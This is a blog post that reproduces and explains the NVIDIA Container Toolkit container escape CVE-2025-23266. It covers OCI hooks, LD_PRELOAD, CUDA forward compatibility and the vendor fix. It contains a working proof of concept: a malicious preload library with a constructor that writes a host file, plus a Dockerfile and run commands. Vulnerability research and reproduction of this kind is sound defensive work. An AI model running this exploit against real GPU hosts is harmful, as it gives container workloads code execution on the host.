NVIDIA Container Escape CVE 2025-23266 (aka NVIDIAEscape)
Introduction
Wiz published on July 17, 2025 about a container escape on NVIDIA’s Container Runtime. The blog post explains in details how an exploit would work, although it does not address a few details regarding the container runtime, more specifically, how does container hooks work under the hook.
Reproducing the issue
You can reproduce the issue yourself with the following steps (they are meant for Ubuntu, but easily adaptable for other distributions):
Install and Configure Nvidia Container Toolkit
- Download the Nvidia Container Toolkit version 1.17.7 or earlier. The one I used was
https://github.com/NVIDIA/nvidia-container-toolkit/releases/download/v1.17.7/nvidia-container-toolkit_1.17.7_deb_amd64.tar.gz
- Unpack the .deb files to ~/release-v1.17.7-stable/packages/ubuntu18.04/amd64/
- Then, run the following commands in order (as
sudo
):
1
2
3
4
dpkg -i libnvidia-container1_1.17.7-1_amd64.deb
dpkg -i libnvidia-container-tools_1.17.7-1_amd64.deb
dpkg -i nvidia-container-toolkit-base_1.17.7-1_amd64.deb
dpkg -i nvidia-container-toolkit_1.17.7-1_amd64.deb
- Configure the NVIDIA runtime by running:
1
sudo nvidia-ctk runtime configure --runtime=docker
- Then, restart docker with:
1
sudo systemctl restart docker
Some of these steps are taken from here
Create a shared library
The exploit requires a shared library to be loaded by the NVIDIA Container runtime. The following code creates one that creates a /owned
file on the host:
poc.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
// poc.c - minimal malicious LD_PRELOAD library (creates /owned)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
// This function is called when the shared library is loaded
__attribute__((constructor))
void init(void) {
int fd = open("/owned", O_WRONLY | O_CREAT | O_TRUNC, 0644);
if (fd != -1) {
write(fd, "You have been owned!\n", 21);
close(fd);
}
}
Build it with:
1
gcc -fPIC -shared -o poc.so poc.c
We will explain later in detail how this code works.
Configure OCI hook for NVIDIA Container runtime
The createContainer OCI hook only executes when the CUDA Forward Compatibility mode is set to “hook.”
Add or edit the /etc/nvidia-container-runtime/config.toml
file so it contains the following:
1
2
[nvidia-container-runtime.modes.legacy]
cuda-compat-mode = "hook"
A detailed explanation about CUDA Forward Compatibility mode will follow later on this post.
Create a docker image
This docker image will contain the poc.so library that we created on the previous step. A vulnerable runtime will load this library and execute it at host level.
Dockerfile
1
2
3
FROM busybox
ENV LD_PRELOAD=./poc.so
ADD poc.so /
The Dockerfile and the poc.so must be in the same folder
Then build the image with:
1
docker build . -t nvidiascape-exploit
The command should create a new docker image with a tag (-t) nvidiascape-exploit
.
Then, run it with the following command:
1
docker run --rm --runtime=nvidia --gpus=all nvidiascape-exploit
If everthing work right, you should see a /owned fine at the root directory.
Understanding the issue
To properly understand how this exploit was crafted, we need to touch in a couple of subjects first:
- Dynamic linker behavior
- Docker alternate runtimes
- CUDA Forward Compatibility
- OCI Runtime Specs and Hooks
Dynamic linker behavior
Whenever an application runs, it might require shared libraries - these are binaries that are not part of the application itself, but redistributed as part of another package. The dynamic linker job is to resolve these libraries during runtime.
The dynamic linker provides a feature where shared libraries under a directory set by the LD_PRELOAD environment variable takes precedence over all others. As a debugging feature, this might sound nice, but it is damning for sensitive applications. The ld.so man pages states:
1
2
3
4
5
6
Secure-execution mode
For security reasons, if the dynamic linker determines that a
binary should be run in secure-execution mode, the effects of some
environment variables are voided or modified, and furthermore
those environment variables are stripped from the environment, so
that the program does not even see the definitions.
As en experiment, try to run this on your terminal:
1
sudo LD_PRELOAD=/home/filiperodrigues/nvidiascape-exploit/poc.so find
You will end you with the same /owned
file as the original exploit.
The poc.so itself is rather simple: upon init, it creates a /owned file, then write some content to it.
1
2
void init(void) {
int fd = open("/owned", O_WRONLY | O_CREAT | O_TRUNC, 0644);
The initializer is provided by the __attribute__((constructor))
function attributes.
Alternate runtimes
The default Docker runctime is runc
. However, you can opt to use other runtimes that implements the containerd shim API. When you ran sudo nvidia-ctk runtime configure --runtime=docker
earlier, you added an entry on the /etc/docker/daemon.json
file, which should look like the following:
1
2
3
4
5
6
7
8
{
"runtimes": {
"nvidia": {
"args": [],
"path": "nvidia-container-runtime"
}
}
That tells Docker to use the nvidia-container-runtime
application whenever you run a container with --runtime=nvidia
CUDA Forward Compatibility
CUDA forward compatibility allows containers or applications that were built with a newer version of the CUDA toolkit (user-mode libraries) to run on systems where the host driver is slightly older as long as certain compatibility libraries are present. This is particularly useful for containerized workloads where:
- You might build and ship containers with newer CUDA versions than what the host has installed.
- Upgrading drivers on production systems isn’t always immediate or practical.
According to the documentation:
1
2
The CUDA forward compatibility package will then be installed to the versioned toolkit directory. For example,
for the CUDA forward compatibility package of 12.8, the GPU driver libraries of 570 will be installed in /usr/local/cuda-12.8/compat/.
It is important to notice that these libraries are installed on the host.
The NVIDIA Container Runtime implements forward compatibility as an OIC hook. If the "nvidia-container-runtime.modes.legacy.cuda-compat-mode"
config option is set to "hook"
, the “ enable-cuda-compat” is then used.
The hook will then execute and mount the compat libraries under “/usr/local/cuda/compat”. The mechanism used is called Container Device Interface.
OCI Runtime Specs and Hooks
We have mentioned OCI hooks a couple of times.
Whenever a container is created by docker, it creates a JSON Structure called OCI runctime spec configuration
. OCI stands for Open Container Initiative, the governing body responsible for container standards.
According to their page:
1
This configuration file contains metadata necessary to implement standard operations against the container. This includes the process to run, environment variables to inject, sandboxing features to use, etc.
For example, you can define a OCI runtime spec configuration like this:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
{
"ociVersion": "1.2.1",
"process": {
"user": {
"uid": 0,
"gid": 0,
"additionalGids": [0, 10]
},
"args": [
"sh"
],
"env": [
"FOO=bar"
]
}
That tells the container runtime (runc
) to run a container with the binary sh
as the application and the environment FOO
with the value of bar
.
These values that are part of this spec can come from different places. For the sake of this blog post, two places are important:
- The Dockerfile
- The NVIDIa container runtime
When Docker “ENV” intruction on the Dockerfile, adds them to the process.env attribute on the spec.
If you have a Dockerfile like the one below:
1
2
ENV FOO=bar
RUN sh
You will end up with a spec like the one above.
The NVIDIA Container runtime is a shim for runc
. According to (Github)[https://github.com/NVIDIA/nvidia-container-toolkit/tree/main/cmd/nvidia-container-runtime]:
When a create command is detected, the incoming OCI runtime specification is modified in place and the command is forwarded to the low-level runtime.
The runc create
command is executed whenever a new container is created. WHen that happens , the The NVIDIA Container runtime updates the spec to add a new hook.
Hooks are applications that can run in different stages of the container lifecycle, such as:
https://specs.opencontainers.org/runtime-spec/config/#posix-platform-hooks
- createRuntime
- createContainer
- startContainer
- postStart
- postStop
A container hook as created by the NVIDIA Container Runtime looks like this:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
"createContainer": [
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"enable-cuda-compat",
"--host-driver-version=575.64.03"
],
"env": [
]
},
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"update-ldcache"
],
"env": [
]
}
Notice that you can specify an environent variable to the hook itself.
The createContainer
hook is special because although it path resolves on the host (or the “runtime namespace”, as the spec says), the hook itself executes within the “container namespace”.
The combination of all of these is what creates this issue:
- Docker adds the environment variable to the container spec
- NVIDIA Container Runtime adds the createContainer hook with no environment variables
- The
/usr/bin/nvidia-ctk
runs, leaving its environment variables unspecifies, which results in inheriting the environment variables from its parent process
The explanation on why does the
/usr/bin/nvidia-ctk
process inherits the parent process environment variables is on the part 2 of this post
Experimenting with nvidia-container-toolkit
If you want to undertand how the NVIDIA COntainer Runtime is implemented, you can clone the following repository with:
1
https://github.com/NVIDIA/nvidia-container-toolkit
This repository creates the nvidia-ctk
and nvidia-container-runtime
binaries, among others.
The function that creaate a new runtime spec is newNVIDIAContainerRuntime
, located on internal/runtime
/runtime_factory.go
The relevant parts are oci.NewSpec and newSpecModifier. These two functions:
- Creates an OCI specification object (ociSpec) from the command-line args. The OCI spec describes how the container should be set up (namespaces, mounts, env vars, etc).
- Creates a spec modifier - a helper object that knows how to change the original OCI spec to inject NVIDIA-specific libraries, mounts, hooks, etc, needed for GPU containers.
You can see the actual spec by doing this:
- Add the following to the newNVIDIAContainerRuntime function
1
2
3
4
5
6
7
if logger != nil {
if specJSON, err := json.MarshalIndent(ociSpec, "", " "); err == nil {
logger.Infof("OCI Spec: %s", string(specJSON))
} else {
logger.Warningf("Failed to marshal OCI spec for logging: %v", err)
}
}
- Edit the config runtime (/etc/nvidia-container-runtime/config.toml) to enable logs:
1
2
[nvidia-container-runtime]
debug = "/var/log/nvidia-container-runtime.log"
Then build it with:
1
make binaries
And copy the resulting file to /usr/bin/nvidia-container-runtime
After that, you should see the following output on the /var/log/nvidia-container-runtime.log
file:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
{
"ociVersion": "1.2.1",
"process": {
"user": {
"uid": 0,
"gid": 0,
"additionalGids": [0, 10]
},
"args": [
"sh"
],
"env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"HOSTNAME=e078abd14abe",
"LD_PRELOAD=./poc.so",
"NVIDIA_VISIBLE_DEVICES=all"
],
"cwd": "/",
"capabilities": {
"bounding": [
"CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
"CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
"CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
],
"effective": [
"CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
"CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
"CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
],
"permitted": [
"CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
"CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
"CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
]
},
"apparmorProfile": "docker-default",
"oomScoreAdj": 0
},
"root": {
"path": "/var/lib/docker/overlay2/b29b8b924bfcb60a5b2adadd98c935fe659480f24be017259f56cf49ead0d3ed/merged"
},
"hostname": "e078abd14abe",
"mounts": [
{
"destination": "/proc",
"type": "proc",
"source": "proc",
"options": ["nosuid", "noexec", "nodev"]
},
],
"hooks": {
"prestart": [
{
"path": "/usr/bin/nvidia-container-runtime-hook",
"args": [
"nvidia-container-runtime-hook",
"prestart"
],
"env": [
"LANG=en_US.UTF-8",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin",
"NOTIFY_SOCKET=/run/systemd/notify",
"INVOCATION_ID=6a71d6bbe6634f0baebf6075a9ece8b2",
"JOURNAL_STREAM=8:22608",
"SYSTEMD_EXEC_PID=2089",
"OTEL_SERVICE_NAME=dockerd",
"OTEL_EXPORTER_OTLP_TRACES_PROTOCOL=http/protobuf",
"OTEL_EXPORTER_OTLP_METRICS_PROTOCOL=http/protobuf",
"TMPDIR=/var/lib/docker/tmp"
]
}
]
},
//etc
You will notice that the LD_PRELOAD is part of the container spec.
The fix
Before the fix, this is how the createContainer would look like:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
"createContainer": [
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"enable-cuda-compat",
"--host-driver-version=575.64.03"
]
},
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"update-ldcache"
]
}
And this is how it would look after:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
"createContainer": [
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"enable-cuda-compat",
"--host-driver-version=575.64.03"
],
"env": [
"NVIDIA_CTK_DEBUG=false"
]
},
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"update-ldcache"
],
"env": [
"NVIDIA_CTK_DEBUG=false"
]
}
With the fix, the createContainer has an explicit “env” section, which is not present without the fix. Since the issue was with
Final thoughts
This post should cover in depth what comes into play for this vulnerabilty to exist. The only part left out was this one:
While prestart hooks run in a clean, isolated context, createContainer hooks have a critical property: they inherit environment variables from the container image unless explicitly configured not to.
I have dedicated a second post for this here